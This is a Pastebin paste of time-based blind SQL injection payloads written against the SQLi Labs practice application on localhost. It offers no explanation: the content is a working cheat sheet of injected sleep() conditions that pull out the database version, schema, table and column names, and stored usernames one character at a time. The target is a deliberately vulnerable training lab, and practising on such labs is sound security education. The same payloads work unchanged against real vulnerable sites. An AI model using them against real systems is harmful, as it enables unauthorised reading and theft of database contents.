API tools faq
paste
Advertisement
moemyintshein

MySQL query blind Base time

moemyintshein
Mar 5th, 2017
98
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.92 KB | None | 0 0
raw download clone embed print report
  1. Chek The Version Length
  2. http://localhost/Sqli Labs Master/Less-9/index.php?id=1' AND IF((SELECT length(version())) LIKE "8%",sleep(5),NULL)--+
  3.  
  4. Check The Database Length
  5. http://localhost/Sqli Labs Master/Less-9/index.php?id=1' AND IF((SELECT length(database())) LIKE "8%",sleep(5),NULL)--+
  6.  
  7. check the table count
  8. http://localhost/Sqli Labs Master/Less-9/index.php?id=1' AND IF((SELECT count(*) TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1) LIKE "4%",sleep(10),NULL)--+
  9.  
  10. 1' AND sleep(5)--+
  11.  
  12. Retrieve version:
  13. 1' AND IF((SELECT ascii(substr(version(),1,1))) = 53,sleep(10),NULL)--+
  14.  
  15. Retrieve version using LIKE:
  16. 1' AND IF((SELECT version()) LIKE "5%",sleep(10),NULL)--+
  17.  
  18.  
  19. Retrieve databases:
  20. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),1,1)))) = 115,sleep(10),NULL)--+ //s
  21. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),2,1)))) = 101,sleep(10),NULL)--+ //e
  22. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),3,1)))) = 99,sleep(10),NULL)--+ //c
  23. 1' AND IF(((ascii(substr((SELECT schema_name FROM information_schema.schemata LIMIT 7,1),4,1)))) = 117,sleep(10),NULL)--+ //u
  24.  
  25. Retrieve Tables
  26. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),1,1)))) = 101,sleep(10),NULL)--+ //e
  27. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),2,1)))) = 109,sleep(10),NULL)--+ //m
  28. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 0,1),3,1)))) = 97,sleep(10),NULL)--+ //a
  29.  
  30. Next Table
  31. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),1,1)))) = 117,sleep(10),NULL)--+ //u
  32. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),2,1)))) = 115,sleep(10),NULL)--+ //s
  33. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),3,1)))) = 101,sleep(10),NULL)--+ //e
  34. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),4,1)))) = 114,sleep(10),NULL)--+ //r
  35. 1' AND IF(((ascii(substr((SELECT TABLE_NAME FROM information_schema.TABLES WHERE table_schema="security" LIMIT 3,1),5,1)))) = 115,sleep(10),NULL)--+
  36.  
  37.  
  38. Retrieve columns
  39. 1' AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" LIMIT 0,1),1,1)))) = 117,sleep(10),NULL)--+ //u
  40. 1' AND IF(((ascii(substr((SELECT column_name FROM information_schema.COLUMNS WHERE TABLE_NAME="users" LIMIT 0,1),2,1)))) = 115,sleep(10),NULL)--+ //s
  41.  
  42.  
  43.  
  44. Retrieve data from another database:
  45.  
  46. 1' AND IF(((ascii(substr((SELECT username FROM security.users LIMIT 0,1),1,1)))) = 68,sleep(10),NULL)--+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!